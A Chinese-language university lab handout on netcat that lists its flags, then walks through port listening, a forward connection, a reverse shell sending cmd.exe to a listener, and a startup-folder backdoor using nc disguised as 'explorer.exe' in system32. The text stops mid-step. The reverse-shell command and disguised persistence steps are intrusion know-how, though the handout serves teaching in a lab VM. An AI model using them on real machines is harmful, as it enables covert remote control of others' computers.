nc实验指导书范文.doc

nc实验指导书范文 实验三利用NC发动网络入侵实验目的nc.exe全称NetCat，被誉为网络安全界的“瑞士军刀”。 nc.exe是一个非常标准的tel客户端工具，是在CMD.EXE下运行的小程序。 它的功能非常强大，经常被黑客用来做后门或者是网络扫描及监听的工具，是黑客们的必备武器之一。 通过本次实验，希望同学们能掌握nc的用法及简单批处理文件的。 实验环境1安装Windows2000/xxServer/XP操作系统的PC计算机一台。 2PC机上要安装虚拟机，并配有不打补丁的操作系统。 实验原理将nc.exe放到C盘根目录下，在CMD.EXE下输入*nc.exeh*，即可看到各参数的使用方法。 （CTRL+C结束NC程序执行）命令参数翻译如下?d后台模式?e程序重定向，一旦连接，就执行危险!?h帮助信息?i延时的间隔?l监听模式，用于入站连接?L连接关闭后,仍然继续监听?n指定数字的IP地址，不能用DNS?o记录16进制的传输?p本地端口号?s本地源地址?t使用TELNET交互方式?u UDP模式?v详细输出用两个v可得到更详细的内容?w超时的时间，将输入输出关掉?z用于扫描时，端口的表示方法可写为MN的范围格式。 实验步骤 一、监听本地端口将nc.exe放到本地机器C盘根目录下，监听本地999端口，具体操作方式如下这里如果是本机的话，可以省去主机名或IP，即不写127.0.0.1，这时默认就是本机。 在没有标明的情况下是监听TCP协议的999端口，即打开999端口并处于监听状态。 如果想监听UDP协议的999端口，语法如下Cnclup999如果想持续监听，语法如下CncLup999另外运行一个CMD.EXE程序验证一下结果，看是不是真的监听我们本机的90端口，结果如下图 二、正向链接1.事先将nc.exe放到虚拟机C盘下，并运行nc，监听999端口。 （此处将其视为服务器端）2.在本机上也运行nc，链接虚拟机的999端口。 （本机可视为客户端）注释192.168.1.3为虚拟机IP3.查看虚拟机，并回答“I amfine,thank you!”.4.本机接收如下 三、反向链接所谓反向链接,简单的说就是目标机主动来链接黑客的机子,而不用黑客主动去找他,当目标机上线后会自动来链接黑客设定的端口。 假设黑客机器（本机）的IP为192.168.1.2，一直监听2345端口nc-l-p2345。 在目标机（即虚拟机）上就可以用这样的命令来实现反弹:nc-t-e cmd.exe192.168.1.22345，它的意思就是把cmd定向在192.168.1.2(本地机器)的2345端口上。 当目标机一上线，则主动与黑客计算机就链接，本地机器显示链接成功，如果运行“dir”命令，则显示的应该是虚拟机硬盘上的信息。 四、用nc反向链接功能构建后门1.事先将nc.exe文件拷贝到虚拟机c:winntsystem32文件夹下，为了避免引起怀疑，将其重命名为“explorer.exe”。 2.一个bat文件在虚拟机上新建一个txt文件，取名为“1.txt”，在其中输入以下内容，如下图所示单击菜单栏中的“文件”命令，在弹出的下拉菜单中选择“另存为”命令，弹出“另存为”对话框，如下图所示，按照下图将1.txt文件转存为1.bat批处理文件。 3.将1.bat复制到“All user”的启动文件夹再将1.bat复制到“All user”的启动文件夹。 将“1.bat”文件复制到“C:Documents andSettingsAll Users开始菜单程序启动”文件夹下，如下图所示。 5.在本机上监听2345端口6.重启虚拟机上的